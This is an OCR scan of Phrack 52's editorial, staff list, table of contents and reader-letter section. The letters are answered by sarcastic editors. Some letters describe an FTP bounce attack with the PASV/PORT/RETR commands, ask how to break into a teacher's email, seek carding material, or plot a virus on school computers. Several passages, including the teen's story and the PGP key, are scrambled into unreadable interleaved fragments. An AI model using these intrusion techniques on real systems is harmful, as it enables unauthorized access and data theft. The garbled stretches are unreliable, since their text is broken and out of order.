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[ PHRACK a. 2 IN D 


eal 
x 


Si naa [ Choose your own SPATH adventure 


Whew. You would be quite surprised at the evil wheels I had to set in 
motion in order to get this issue out. According to Newton, a Phrack Issue 
remains at rest or continues to move in a straight line with a uniform 
velocity if there is no unbalanced force acting on it. This issue was at rest. 
Its velocity was constant. And there were few forces acting on it. Anyhow, 
after many machinations it’s here. Enjoy. 


I have a gripe. Something upon which I’d like dwell for a spell. lLet’s 
talk about coding aesthetic (from the C programming standpoint). Now, this is 
not a harangue about effective coding or efficient coding, I’1l save those for 
some other time (perhaps for the time when I feel I can write effective and 
efficient code proficiently enough to vituperate to those who do not). I 
want to touch down on a few topics of visual appeal, which are overlooked so 
often. 


The five major areas I will cover are indentation, brace placement, 
use of whitespace, commenting, as well as variable and function nomenclature. 
I suppose I should also mention that coding style is a personal preference 
type of thing. There are all kinds of schools of thought out there, and all 
kinds of methodologies on how to write pretty code. In the grand scheme of 
things, none are really any more correct than any others, except mine. 


C is, for the most part, a format free programming language. Code can be 
written with all manner of whitespace, tabs, and newlines. The compiler 
certainly doesn’t care. The machine doesn’t care. This can be a double 
edged sword. There is quite a bit of room for artistic interpretation. And 
just like in real life, there is a lot of crappy art out there. 


Indenting your code is a must. Please, do this. Indentation is here for 
one simple reason: to clearly and unequivocally define blocks of control. 
However, 8 space tabstops are overkill. Unless you are using a 2 point font on 
a 13" screen, 4 spaces should easily define your control blocks. This allows 
you to maintain clarity on an 80 column screen while nesting blocks of control 
much deeper then you would with 8 space tab stops. 2 space tabstop advocates 
should be shot. However, don’t let typography take over your code (ala ink 
obscuring the intent). If you have 7 million levels of indentation, perhaps 
you should rethink your approach to tackling the problem... 


Bracing has a simple solution. The most effective use of bracing is in 
placing them on newlines so that they neatly enclose the area of control. This 
is especially important with nested levels of control. I know this generates 
empty lines. Oh well. They’re free. Blocks of control become easily visible 
and it is easy to isolate one from another. This goes for functions as well 
as conditionals and loop structures. I know I go against K&R here. Oh well 


In the pursuit of clear, readable code, whitespace is your friend. Single 
space all keywords and all variables and constants separated by commas. It’s 
a simple thing to do to drastically improve readability. When you have a 
series of assignments, one after another, it’s a nice touch to line them up on 
the closest relative 4 space boundary. And please, no spaces between structure 
pointer operators and structure contents. 


Commenting is a delicate matter. Descriptive, concise, well written code 
shouldn’t really need commenting, or at least very much of it. But this isn’t 
a rant about descriptive, concise, well written code. If you feel the need 
to comment your code, follow a few simple rules: 

Keep the comment block as small as possible. 
—- Don’t tab out your comment frames to line up with each other. That’s 
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just plain fucking annoying. If you’re doing that, you have too many 
comments anyway. 

—- Commenting datatype declarations rather then the functions that 
manipulate them is usually more helpful. 

- If you must comment, keep your style as consistent as possible. If the 
commenting detracts from the readibilty of your code, you’ve just ponied 
up any clarification you might have achieved with the commenting. 


The major exception to these rules are file headers. The beginning of 
source and header files should always have some descriptive information, 
including: file name, author, purpose, modification dates, etc... These 
comment blocks should always have a simple vertical line of unobtrusive 
astricks, framed with the required forward slashes. People using C++ style 
commenting in C programs should be drawn and quartered. 


The other exception to this rule is when you are writing code specifically 


for the benefit of others. If the code is intended to be a learning tool, 
copious commenting is allowable. 


Variable and function nomenclature should have connotation as to what their 
purpose in life is. As short as possible while still preserving some sort of 
identity. Descriptive names are wonderful, but don’t go overboard. Generally, 
a condensed one or two word descriptor (possiblely connected via an underscore) 
will work fine. And please, no mixed case. The only time uppercase characters 
should appear in C code are in symbolic constants and macros (and possibly 
strings and comments). 


This tirade is the result of my experiences in reading and writing C code. 

In my travels as a stalwart mediocre programmer, I have progressed through many 
levels of maturity in my programming style. Much of my old code exhibits many 

of the very things eschewed as anathema in this jeremiad. Well, what can I 


say? I believe that I have grown. I am at home with the me. This is me 

breathing. (Tell me what movie that’s from, and I will give you a Phrack 

Donut.) 

Enjoy the magazine. It is by and for the hacking community. Period. 

—- Editor in Chief route 

—-- Director of Public Operations -- dangergirl 

-- Phrack World News disorder 

—- Werdsmith loadammo 

Elit > asriel 

-- Santa vs. Jesus Iss vs. SNI 

—- Festively Plump Cartman 

-—- Extra Special Thanks -----------— No one. 

—- Official Phrack CD FLA/Flavour of the Weak 

-- Official Phrack Drink --—-------- ‘The C Kilborn‘ (2.9 parts ketel one, 
-l parts tonic) 

-- Shout Outs and Thank Yous ------— Lords of Acid, cantor, Yggdrasil, 
snokerash, Voyager, TNO, Jeff Thompson, 
angstrom, redragon, Rob Pike, halflife 

—- B.A. Baracus Phrack Fracas —----—-— loadammo vs. Death Veggie 

-- Original flip.c author (props) - datagram 

-—- Gas Face Given (drops) --------- solo, klepto 
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phrackedit@phrack.com 
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Submissions to the above email address may be encrypted with the following key: 


sees te BEGIN PGP PUBLIC KEY BLOCK--—---— 
Version: 2.6.2 


mQENAzZMgU6YAAAEH/1/KclKrcUlyL5RBEVeD82JM9skWn60HBzy25FVR6QRYF 8uw 
ibPDuf 3ecgGezQHM0 /bDuQfxeOXDihgXONZzXf02RuS/Au0yilLKgGGfqxxP 88/0 
vgEDrxu4vKpHBMYTE/Gh6u80tcqfPYkrfFZJADZPEnPI7zw7ACAnXM5F+8+telt2j 
Onjg68iA8ms 7W5f0AOCRXEX£CznxVTk470JAISx76+2aPs 9mpIFOB2f£8u7xPKg+W 
DDJ2wTSlvXzPsmsGJt 1lUypmitKBOYvUrrsLtTOQ9FRavflvCpCWKiwCGIngIKt3yG 
/v/uQb3qagZ3kiYr3nUJ+ULk1Swe j+1lrReIdqYEABRGOGjxwaHJhY2t1ZG100G1lu 
Zm9uZXhicy5 jb20+tAIQaHIhY2sgTWFnYXppbmu= 

=liyt 
SSS END PGP PUBLIC KEY BLOCK----- 


As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED. Phrack goes out 
plaintext. You certainly can subscribe in plaintext. 


phrack:~# head -20 /usr/include/std-disclaimer.h 
/* 

* All information in Phrack Magazine is, to the best of the ability of the 
editors and contributors, truthful and accurate. When possible, all facts 
are checked, all code is compiled. However, we are not omniscient (hell, 
we don’t even get paid). It is entirely possible something contained 
within this publication is incorrect in some way. If this is the case, 
please drop us some email so that we can correct it in a future issue. 


* 

* 

* 

* 

* 

* 

* 

* Also, keep in mind that Phrack Magazine accepts no responsibility for the 
* entirely stupid (or illegal) things people may do with the information 

* contained here-in. Phrack is a compendium of knowledge, wisdom, wit, and 
* sass. We neither advocate, condone nor participate in any sort of illicit 
* behavior. But we will sit back and watch. 

* 
* 
* 
* 
* 
* 


Lastly, it bears mentioning that the opinions that may be expressed in the 
article of Phrack Magazine are intellectual property of their authors. 
These opinions do not necessarily represent those of the Phrack Staff. 


/ 
[ TABLE OF CONTENTS 
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2 Phrack Loopback Phrack Staff 60K 
3 Line Noise various 79K 
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5 Everything a hacker needs to know about getting busted Agent Steal 72K 
6 Hardening the Linux Kernel daemon9 42K 
7 The Linux pingd daemon9 17K 
8 Steganography Thumbprinting anonymous 35K 
9 On the Morality of Phreaking Phrack Staff 19K 
10 A Quick NT Interrogation Probe twitch 18K 
11 Subscriber Loop Carrier voyager 48K 
12 Voice Response Systems voyager 18K 
13 Pay Per View (you don’t have to) cavalier 19K 
14 The International Crime Syndicate Association D. Demming 20K 
15 Digital Certificates Yggdrasil 14K 
16 Piercing Firewalls bishnu 31K 
17 Protected mode programming and O/S development mythrandir 76K 
18 Weakening the Linux Kernel plaguez 27K 
19 Phrack World News Disorder 64K 
20 extract.c Phrack Staff O8K 
687K 


1.txt Wed Apr 26 09:43:42 2017 4 


When Sen. Bob Kerrey (D-Neb.) was asked to define encryption, the results 
were horrific. "Well, I mean, to answer your question, I mean, encryption is 
—-- the political equivalent of encryption is you ask me a question, I give you 
an answer and you don’t understand it," he managed. "I mean, I intentionally 
garble the answer frequently. I intentionally garble the response so that you 
can’t understand what I’m saying. And that’s -- you notice that I’ve got the 
ability to do that." 
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[ PHRACK 52 LOOPBACK 
at [ Phrack Staff 
[ Ed. note: The letters are perhaps editted for format, but generally not for 
grammar and/or spelling. I try not to correct the vernacular, as it often 


adds a colorful perspective to the letter in question. ] 


Ox1> 
[ P51-02@0x14: ...Xarthons submission about Linux IP_MASQ in Phrack 50... ] 


In reply to Swift Griggs ranting about my stupidity, 
(and disrespekt i recieved from the rest of the AOL community) 


Swift: the ’problem’ in IP_MASQ which I reported was not meant 
to be considered a security problem, rather a notification 
of a potential problem, or at least this is what i was told. 


i stole this /’problem’ from a evil hacker who works for the NSA. 
at the time, if i had been aware that the info i ripped from him 
was totally false, i would have said so in the letter. 

and believe me, if [named_removed] was awake more than 5 minutes 
a day i would be severely anal at him for informing me of 

this false intelligenc 


the main thing the hacker/phracker/aol community needs to 
learn from this event is that when giving information to be 
ripped, it should be correct. next time ill make sure 

to reword the context i have pasted with GPM properly. 


btw, i must apologize for the tabs in this letter, pico 
has proven difficult to use. 


i must go, i have to pry this gerbil off my flacid cock. 
thanks, and keep hackin! 


xarthon 


Ox2> 
P51-02@0x1lb: You have our permission to write r00t on your backpack. ] 


That may be the funniest response to a letter I have ever read. 
Your response to MICH Kabay was a close second. 


The wait was well worth it. I would rather see quality Phrack 2 or 3 times a 
yar than crap delivered every 3 months. I have to get back to reading now.... 
pip (John) 


[ Go away Pip, nobody likes you. ] 


0x3> 
[ P51-02@0x2c: I have a question regarding a certain piece of hardware... ] 


It’s a barcode scanner used at some terminals, such as public libraries. You 
plug it in between the keyboard and the computer, and when you want to scan in 
a barcode from a book being checked out or an item being purchased, you push 
the button on the SCANNER and it outputs the barcode in ASCII numeric just as 
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if it had been typed in from the keyboard. So, now ya know. 


Unknown/ 604 


d00d, that’s a sO0p3r s3kr3t CIA, FBI gOvt. cOnspir@cY k3yb0ard fllt3r!!@@!21 


Actually, your mystery device sounds more like the "box" that connects between 
the keyboard and a barcode scanner. The "SCANNER" connector is where you’d 
plug in a typical "wand" or "gun" barcode reader. Not much you can do with it 
by itself, IMO. Again, it might be something else, but that’s what it sounds 
like to me. 


nate@millcomm.com 


What this sounds like is the interface from one of the wand or 
lightgun-type laser barcode readers. These can be seen in action at 
some of the retail outlets around here for reading barcodes from 
clothing price tags or whatnot. One of those useful inventions that 
came out of turning 386’s into POS terminals. 


It’s probably useless without the accompaning wand, but you might keep 
it around and try to find the missing part. 


wiz 


[ We received a gaggle of responses to this inquiry. To those of you who sent 
in responses, our humblest thanks. ] 


Ox4> 


Hi! 

I need your help! 

Tell me, please, where I can found information via Internet 
about Carding (Scheme of reader/writer and etc.) 

thanks. 

Bye. 


[ http://www.etexguide.com/cardtricks ] 


Ox5> 


[ P50-03: Portable BBS Hacking by: Khelbin ] 
Dear Phrack, 


An old article of mine entitled "Portable BBS Hacking" appeared in Phrack 


issue 50 under the line noise section. In Phrack 51, a reader expressed that 
he/she was frustrated at not being able to apply the techniques that were 
described in my article. Please publish this response in Phrack 52 


Let me state right off the bat that "Portable BBS Hacking" was not 
written to specifically expose any one software-specific problem. Instead, 
the article introduced a potential security threat to all BBS software so that 
SysOps around the globe could check for such vulnerabilities and correct the 
problem if it was present. A ’mock’ Renegade setup was used just because some 
software had to be used in order to explain the theory behind the attack. 


Now to address the frustrated reader who is obviously aspiring to become 
an ever-so-elite BBS-h4x0r! While I often enjoy toking on a crack pipe, this 
method was tested prior to writing this article. It was tested on Renegade 
04-x quite some time ago (as the article had been written some time ago, but 
never published). I currently run FreeBSD 2.2.2, so I havn’t been able to do 
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any more testing to help you hack BBS’ and become ph33red. *BUT*, I am sure 
that versions of THD ProScan (a utility to scan uploaded files for viruses and 
other problems) will foil this attack. I am also sure (just by what I remember 
of how Renegade works) that If you follow the steps that I gave you in Phrack 
50 correctly, upload a file, and then the SysOp were to (X)tract files from 
that file into \temp that it would work. I am also sure that there are other 
packages out there other than THD ProScan that do the same thing, but not ina 
secure fashion. The methods described in "Portable BBS Hacking" will also work 
with these packages. I hope you weren’t just having Renegade check the fil 
integrity with pkunzip -t or just view the contents of the zipfile. Your 
response wasn’t very specific so it’s hard for me to be specific in this 

reply however, I can tell that you also enjoy an occasional joint of 

crack, so feel free to contact me sometime and we’1ll smoke! 


Yours Truly, 
Khelbin Sunvold 


Ox6> 


Hi, 
What program do I have to use in order to read the Phrack Magazine? 


Thank you, 
Adrian 


[ We at Phrack Magazine do not explicitly endorse any particular program, 
however, many 12 step programs work wonders: Narcotics Anonymous, Overeaters 
Anonymous, Codependency Anonymous, Debtors Anonymous, Beyond Controloholism, 
Science Fiction Addiction, etc. Also try: 

‘gzip -dc phrack.tgz | tar xvf -*. ] 


Ox7> 


Please allow me to introduce myself. My name is Itai Dor-on and I am a system 
integrator From Israel. 


No introductions are necessary. ] 
I got the phrack.com address from one of the subscribers on the 


firewalls@GreatCircle.COM mailing list in response to my inquiry on smtp 
exploits. (phrack 50) 


shattered: ~/Phrack/50:"~> grep -i SMTP * | grep -i exploit 
shattered: ~> 
There are no SMTP related exploits in Phrack 50. ] 


I downloaded the file but it seems that it is encoded in a format which I can 
not read. I use windows 95/NT. I would like to know if there is a special 
viewer for the file. 


[ Ss above letter. ] 


Is there other informative information in the phrack.com site that is relevant 
to Security exploits in tcpi/ip 


[ Phrack 48 - 52 ] 
I thank you in advance for any response 
Yours Truly, 


Itai Dor-on 


Ox8> 


Phrack is the best magazine of its kind I’ve ever seen !!! Maybe you could 
write something about tapping telephone wires in order to record data and 
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fax on a portable tape recorder. I’ve read an article from Damnation that 
was pretty good, but maybe you could give me, and the other readers of 
course, some additional information. I’m also interested in hacking the 
E-mail server of my ISP in order to read my teacher’s mail, so what kind of 
program do I need to do this ? I know his login but I don’t know his 
password. I’ve got a terminal program called Dialog that doesn’t seem to 
be very useful, but maybe you know a better one ?!? Now, my last question: 
I’m using CuteFTP to log on to my homepage’s folder . One day I’ve found 
some write protected folders and files, so my question is how do I get 
access to these files and how do I go to other folders to which I’m not 
allowed to go (hidden,write-protected, etc.) ? 


Thank you very much in advance ! 
Host 


[ I had a flame all ready and prepared, but this letter really seems to set 
itself on fire. ] 


Ox9> 


Hey guys, I’m a first time ready and, well duh, first time responder to 


yer mag...I must say that I am thoroughly impressed with what you’ve all 
put together...as a Linux user, it shall certainly be a very useful 
utility/resource for me...I just nabbed the 5lst issue and it rocks thus 


far...downloading the other issues as I type this...just thought you might 
like to know ya got another reader who is overjoyed at getting off his 
lazy ass and finally reading yer mag which i’ve heard about in the past... 
Ezines never were something for me but i said fuckit and went for Phrack.. 
your mag is the most informative and entertaining Ezine that i’ve seen to 
date (and i been on the ’net for 4+ years now...that might say something) 
anyhow, enuf blabber from me, L8! 


—GnEaThEg0d 


[ Well, thank you very much. ] 


Oxa> 


I’d like to congratulate Narbo on his brief introduction to CCS7. I 
was begining to think that noone was interested in telecommunications 
anymore. 


[ Agreed. Note that we would very much appreciate further submissions of 
this kind. ] 


One thing I’d like to add for Phrack’s Japanese audience is that they are 
the odd balls when it comes to signaling data links. While signaling data 
links are 56kbps in North America and 64kbps virutally everywher lse, 
Japan uses 4.8kbps links. Actually I guess we, in North America, are 

also a little odd at 56kbps but at least it’s closer to the norm. 2) 


-khelbin 


Oxb> 


Yea, I wanna subscribe to phrack..This is my e-mail 
address..noah6@juno.com...Sign me up if I’m writing the right place..if 
not..tell me how to subscribe 

later 

oh yea..I know I’m not supposed to ask..but I don’t have internet 
access..I could use all the back issues of phrack in one big long letter 
if you could..I can’t recieve files with this account..so if you could 
cut and paste or some shit... 

later 


[ Sure. Let me get right on that. Even better, what’s your postal address? 
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I’1ll have the Phrack Tactical Team deployed to your house to come hit you 
on the head with a tack hammer because you are a retard. ] 


Oxc> 
Good issue, by the way... 
[ Thanks! ] 


So whassup with the Milla pictures? Did you mention them in P51-1 just to 
taunt us? How do you get the _non_ASCII version of P51? 


You’ re too cruel... i) 
JSRS 


[ Sorry. That Carl’s fault. He’s new. (Moo. Moo moo.) ] 


Oxd> 

To the Anti-Christ, 

[ Apparently, there was a postal mix-up and we are now getting Satan’s mail. 
When I grow up I want to be just like you. 

[ Great! So, I’1l see you at the next Klan-youth meeting? ] 


That said, can you walk the talk? If so, I have a challenge for you. 


[ ‘walk the talk’? Note: This is email. Something you’ve mailed to a 
whiley bunch of knuckle-knobs. And quite possibly something that could 
be used to make others laugh at your expense. In the future, take the tim 


to grammar and spell check your letters to minimize the emotional damage 
you are bound to suffer. ] 


I am a neophyte in the 
DarkSide,and need some help catching/avoiding a phreaker,hence th 
interest in your mag. He breaks into phone lines at home and work. 
Tapes conversations and interjects various rude noises on important 
calls. Do you have any ideas as to what I can/should do to protect my 


[ Sommy! ] 


privacy and catch this guy? If this is not within your realm of 
expertise, can you refer me to someone for whom it is? 


7 


[ Try the PHONE COMPANY. ] 


Don’t take my intial inquiry as anythng but an effort to become part 
of the hacker/phreaker world for the sake of my own protection. I 


[ For your own protection, I suggest NOT becoming part of *any* community. 
Live the rest of your life as a hermit inside a hollowed-out oaktree. ] 


understand there are many ’good’ hackers in your world willing to offer 
assistance in this arena. 


Your assistance would be greatly appreciated. Thanks. 


Oxe> 

Sirs, 
First,thanks for the obvious hard work that goes into your ’ zine. 
I guess I’m what you what you would call a "tryin’ to be". 


I’ve got all the back issues and read some every day.I was just 
reading 51,and had to say that besides all the other great things in the 
‘zine,it’s great to s some people still have a great f*ckin’ sense of 
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Thanx again, 
(to busy trying to learn to have come up 
with a cool handle)...R 
[ Stop it. I’11 get a big head. ] 
Oxf> 


I am a newbi 


hacker/freaker/cracker/sometimes anarchist. 


some of your first Phrack 
making!I am gonna try tha 
later on this year....I w 


you are gonna get sooner or later about making the ULTIMAT 


bomb....it is REALLY dest 
THANK YOU 
Demonhawk 
[ ATTN Deliquent parents: 


Ox10> 


issues and I LOVED EM! 


Especiall 


I have read 
y the bomb 


t stuff when I finally go 
anna blow shit up!! 


ructive... 


Increase Ritalin by 0.5 mg/Kg. 


to my dad’s house 


I have a submission that 


BE 
Bh 


pipe 


] 


I wake up, 
finally walks in and says 
the only thing that I can 
shirt looks best at the t 


se that bathroom becaus 


I go and comb my hair 


Day in the Life of 
Hacker: 


a Teenage 


Story of My Current Non-Life 


By: 


Demonhawk 


"Time to get up!" 
think of that I like, 
ime. 


, 


min 


chool. The block schedua 


u 
t 
s 
W 
I 


computer’s 
leave your 


lay down-most o 
monitor on and 


han 10x10 feet of space). 


computer on all 


staring at the ceiling for ten minutes before my mother 
I stand and dress myself. 
blue jeans and just whatever 


Weari 


nor a sink, nor more 


EXCRU 


l makes my backpack 


hile on A days it is light as a feather. 


the time-and go back to 
type something for a whil 
night, WRONG! 


better to leave it on!). 
he middle school (Connall 
computer suntil school 


night before while I 
school’s computer system. 
supposedly student proof 
coul 
smart to have one that a 


Ly Middle School) 
starts 
I go to my first cl 


It is time to go to school 


lass, stil 


lay awake in my bed pondering what I cou 
lity installed network 


[The recen] 
little do they know). 


( 


student can’t guess. 


I think about th 


wou 
computers to hack em. 
(or even booting into dos 

Last year, I will 
for crashing a teacher’s 
come back to find out all 


ld be stupid to hack ’em, 


computer. 


consequences of hacking ’ 


after all, 


ee 


remember angrily, 


fingers were being poi 


the annual 
Then, 
to work!" (I am in shop first period) 
t 
two-maybe thr 
questions and I will answer them 
one up, after all, 


"good kid’s" Six Flag trip and that R 


Little does she fuckin’ 


where I go in and pl 
(get there 30 mins early). 
ll groggy from the little rest I had the 


I have the so 
ld hack it easy. Crack the passwords that the teachers think they are so 


IATINGLY heavy on B days 


sleep. Others I turn my 
le (my mom says it is bad 
know it is 
l and my mom drives me to 
lay on the 


ld do to the 
(Novell) was 
fiware and I 


m, then realize that it 


(easy) with a boot disk 


I remember how I got a bum wrap 
I was on it then absent for a week and then 
nted at me. 
EALLY pissed me off. 
as the first period teacher begins to yell 
I wake up and real 
hinking. Most of the period I will talk to my friends about hacking 


I got kicked off 
l something like "Get 
lize I had been 

(the 


friends I have in that class) and they will ask me computer 
(and if I don’t know an answer I will 
they have no idea how to use a computer to its full 


make 


ng 


(walking to my mom’s end of the trailer house to 
doesn’t have a mirror, 
I walk back to my room and get my books ready for 


to 


IT am the only one smart enough on the 
I can crack Windows passwords 
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limitations). 

After a few more minutes of thinking I realize a virus will be the way 
to go. The only problem is putting it on the computer. How? Well, maybe if I 
can get access to a teacher’s computer while she/he is out of the room. Yeah, 
that would be the only way. But the witnesses (who am I kidding the kids up 
there would LOVE to see the computers crash, in fact, I have been offered 
SSSMONEYSSS to crash em). I think about the virus idea for a moment. Yeah, 
that is the way to do it. First period is over. I move to my second class. It 
is a no brainer (on both of the days) and I have a lot of time to plot out my 
plan. Trojan Horse. Yes, or maybe Darth Vader...as a calling card. Yeah, that 
would be the way to go. The Trojan Horse virus followed up by the Darth Vader 
virus. Yes. Well, 

I have one of those two. Now lets think here. How to gain access to the 
computer at school. The teacher looks at me and tells me to "get to work!" 
and I look at him/her and reply, "But I am already finished!" and they leave 
me alone. But, maybe I should wait until I am in High School (when th ntir 
district will have the internet) and I could port in and leave the virus. 
Yeah, that would work, I couldn’t be blamed since I wouldn’t go to the Middle 
School any longer. That is a possibility. 

I cheat at my math for a while (copying the back of the book for some 
easy answers) not because I am dumb, hell no, I am in Algebra I in the 8th 
grade for Christ’s sake! No, I am just lazy, except when it comes to the 
computers. Second period is over. 

I walk to my third class of the day, an hour till lunch when I get to 
talk to my ENTIRE 5 friends at one time (there are some almost friends in this 
group, people I get along with and, yes, on occasion like to hang around with). 
You see, I am a "nerd" and proud to be one! Now, this is the thing. I am not 
just ANY nerd, I am a nerd with RED hair and fairly THICK glasses with THICK 
frames (I want contact lenses that have mirrored silver on the outside but I 
am not allowed to have them for some fucking unknown reason). 

I do my work, hoping that lunch will come, and eventually it does. I 
walk down the halls meeting a friend or two along the way, getting pushed by 
hicks that don’t think computers are "cool". (Just as something that made 
people think I did a speech in Drama class on how computers are gonna crash in 
2000 because of the Millenium Bug. One kid almost pissed in his pants when I 
told them safty systems on Nuclear power plants might go offline and how that 
all cars with electronic timers that shut down until an inspection won’t run. 
Plus power might go out, I think that made them appreciate computer freaks 
like you and me just a LITTLE more since WE are the only ones that can save 
them from that hideous fate!!) 

I am laughed at because I run and internet Star Wars club (The 
Conflict at www.geocities.com/Area51/Zone/9875 ). But they don’t laugh when I 
tell them I can hack into the school’s computers. They look at me dumbfounded 
and then make some smart ass remark. I look at them for a second and walk away, 
I know they don’t understand how much of a computer GENIUS I am. Well, to tell 
the truth I am NOT really a computer GENIUS. Well, in some ways I am. I mean I 
CRAVE knowledge like I CRAVE food when I am hungry and water when I am thirsty. 

I can’t get enough computer knowledge, I ALWAYS need more (currently I 
am learning C, C JAVA, JAVAScript, Visual Basic, and QBasic <----I forgot 
most of what I used to know on that one) 

I eat my lunch (usually Nachos but sometimes Lays potato chips and an 
ice cream) and then go outside where I get an RC Cola. The bell rings and we 
are all herded back inside the main building where we suffer out the rest of 
the day. 


I make it past the rest of 3rd with no problem. Then comes fourth. It 
is a little nerve racking to sit there while time slowly slips by, waiting for 
that bell to ring so that you can be set free of this hellish place. 

The bell rings and I leave the school, heading outside where the buses 
load. Mine is the last and after an hour or waiting it arrives (thank GOD I am 
the first one off) and I go inside my nice, cool house. I turn my computer on 
(if it is off) and begin my homework (I lie about having homework so that I 
can play on the computer without being touched by my mother). I wash the 
dishes and water the dogs. Then I sit down and play on the computer a little 
bit. 


= 


I get on the internet a little while later. I learn a LITTLE more 
hacking and play some games over the internet (ain’t technology wonderful???) . 
I am far from being an 31337 hacker, but I am doing some good a little. I am 
basically a newbie but I can still hack Novell (childs play). 
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After a while of this I take a shower and lie down in bed, dreading 
the next day (unless, of course, it is a weekend). 


And that, is my Non-Life. 


[ ATTN DELIQUENT PARENTS: Increase Ritalin by 1201293 mg/Kg. ] 


Ox11> 


Dear sir, 

First off, i think phrack is a wonderful publication, the best of its 
kind and better than most, if not all, of the computer related 
commercial publications. You and your staff are doing a great job and 
please keep up the excellent work :) 


[ So, we’re better then 2600. Thanks! *That’s* the validation we needed! ] 


That said, i have a request. I’m writing a paper on the hacking 
subculture and such a project would be, to say the least, severely 
lacking without the inclusion of groups like Phrack Inc., 10pht, and 
[ Phrack is not incorporated. And you mean ‘10pht*. ] 


r00t. So i would greatly appreciate it if you could fit it into your 


[ You are already severely lacking. You failed to mention the guild. You 
even forgot b0Ow. ] 


doubtless busy schedule to send me a history of Phrack. It can be as 


brief or as in-depth as youd like. From just the date of creation and 
pivotal events in Phrack history to a summary of every passing member’s 
contributions to the publication... anything you can send will be an 


asset to me. Also, if you or any of your staff members would be so 
[ I’1ll get some of my interns right on that. Alhambra! Get to it! ] 


gracious and godly-wonderful as to answer the few questions below that 
would also be greatly, GREATLY appreciated. 


Q: What is your most commonly used handle and why did you choose it? 


[ *‘route*. Cos I thoroughly route my foes. And also cos I route through all 
my girlfriends’ purses when they are in the bathroom. ] 


Q: What is your position at Phrack? 
[ I AM PHRACK. ] 


Q: When did you realize you were a hacker(or phreaker, cracker, 
whatever applies to you)? 


[ It is something you are born with. It is not something you learn. There 
is no single moment of realization. It is something you just ‘are’. It 
is this unexplicable and inexorable pursuit of knowledge. To learn. To 
break. To fix. To push. To optimize. To learn. To hack. ] 


Q: What do you think hacking is Really about? 


[ Oh c’mon man. Chicks and Money. That’s what it ALL boils down to. ] 


Q: How do you think the ’scene’ has changed, and where would you like 
to see it go? 


[ See P48-02a ] 


Q: If you could say anything to the community at large about hacking, 
what would it be? 
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[ Um. Most of what you people consider hacking is simply a justification or 
shield for doing illegal acts. ] 


One last thing, do you know where(email, www address, whatever) i 
could contact current or former members of 10pht, rOOt, or any real 


[ Um. Let’s see. http://www.10pht.com. http://www.r00t.org. And so on. 
You’re not a very smart person. ] 


group (ie: not one of the lame new groups trying, unsuccessfully, to 
copy the greatness of the older groups)? 

Any response, including negation so i can search elsewhere, would be 
greatly appreciated. Thank you for your time. 


Weaver 


Ox12> 
Is it possible to "Hide" your ip while on tcp/ip connection 
if so how? 

Thanx 

[ Yes, look into Onion Routing. ] 


0x13> 


Hi Phrack-editors, 


I’m looking for a good and experienced hacker to hack a German site. 
There is enough money involved to satisfy you. 


[ My price is quite high. Actually, fuck it. I don’t want money. Give me 
flesh and fame. Get me som lite movie role where I am the hero and Milla 
Jovovich is my love interest. Then we’ll talk. ] 


I will give your more information with further correspondence. 


Please let me know soon if you are interested, (just reply to this 
usa.net address), thank you, 


Diogenes 

Ox14> 

I recently read about the ancient ftp bounce attack. I have tried it and 
it works on versions of ftp that are lower than wu-2.4.2. Here’s what I 
do. 


[Receiving Machine no system req’s except write access] 
TXPE: ‘I. 

PASV (Give’s IP then port) 

STOR 


[Sender Machine w/ver 2.4 or lower] 

TYPE I 

PORT <reciever’s IP and port that was shown in the PASV command’s output> 
RETR <filename> 


[Receiving Machine] 
Binary Mode Transfer Started 


It then goes on to get the file. 
Buty. +< 


If it is a wu-2.4.2 ver computer, the sender machine says Illegal PORT 
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Command, when you type the IP and port of the receiving computer. You can 
only do a PORT command that includes the IP address that I am coming from. 
Sorry to say I don’t know how to do any kind of source route or IP 
spoofing, although I’d be interested to hear if this was the only answer, 
and am not sure if there is a way to get around this. 


Ox15> 
how can I phreak succsesfully in Germany??? 


[ The Germans hated me when I was there. I think they hate all Americans. 
Something to do with WWII or something I guess. ] 


Ox16> 


Hello there :) 
Probably u don’t know who I am 


[ Definitely. ] 


well, I’m an italian boy and I wish to say ya one thing 
You’ re Great. 


[ Oh. C’mon now... Really? ] 


I’ve just start to reading Phrack (the last issues) and I guess that it’s 
a very cool wonderful zine. 


[ Get out. You think so? ] 


Why am I tell ya this ?? 
Well, since I think that one person is as ya ... well he’s great. 


[ Now stop that. I’m really getting embarassed. ] 


I’m trying to learn something from ya (and I shall overcome .... I hope :) ) 
I’m interesting in hacking .. but I’m not like some other ppl that always ask 
"How can I be an hacker ??" "where I can find something to became root" 


I guess that they haven’t understood nothing 
he REAL HACKER (for me) is an expert, has an etic and he hack to learn 

The knowledge is one of the thing most important in the world (the other ones 
are the GIRLS =) ) 


So I won’t ask ya how to be an hacker ... (even cause you’ll propbably say me 
FUCK YOU ;) ) 

we’re so far but maybe one day we could meet :) to share our knowledge 

[ Wait a minute. Are you coming on to me? ] 


Well, Thanx a lot and excuse me for all the time you spent to read this letter 
Excuse me also for my terrible english 


[ NP. Luckily Alephl was over, so he translated for me (‘course, then I 
needed someone to translate that, too). ] 


Cool and great stuff has Phrack =) 


[ Agreed. Great stuff has Phrack. § ] 


Ox17> 


Hi, i noticed that you fixed up your web page, and thats nice, but my 

probelm is, that when i downloaded the phrack 51 issue, it came like this 
" phrack5l.tar.gz "so,....what kind of program do i use to open it? 

Can you just put all issues in zip format? That would help us all! 


[ ’Us all’? You are of course refering to the entire moron population. 
Phrack does not cater to the morons of the world, sorry. Try 2600. I hear 
their target audience is a bit thicker skulled. ] 
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O0x18> 


Fs 


I sent you an email a while back asking you to forward a message to 

an author of one of your articles, since he wanted to remain anonymous. 
However I never got any reaction either from the author or from you. 
It’s really important for me that I find him to discuss some 
techicalities. 


The article was; "How to make your own telecards" 
Volume Seven, Issue Forty-Eight, File 10 (and 11) of 18 


Did you manage to send th mail off to him successfully? 

All I want is for him to contact me on this address (raven@swipnet.se). 
If he wants to remain anonymous he could easily create an email account 
on www.hotmail.com or another service of that kind. 

It would be very nice of you to forward this email to the author of 

the article and reply to me wether it was sent successfully or if it 
bounced back. 

thanks 


[ This is the best we can do. ] 


Ox19> 


Hey there... is there any way to get phrack in just one big file instead of 
getting it in a lot of separate files? Thanks... 


Thanks, 
Crystalize 


[ ‘cat phrack* > master_phrack.blob* ] 


Oxla> 


im having trouble finding uk phreak iNfOs! can u help me out? im looking 4 
bt c7 info and uk payphones. cheers 


[ Hrm. I know several Brits who like me tho. And I like them, too. Much 
more then the Germans. The .uk girls are waaay prettier too. ] 
Oxlb> 


HELP> Your the Best I need your help FAST 


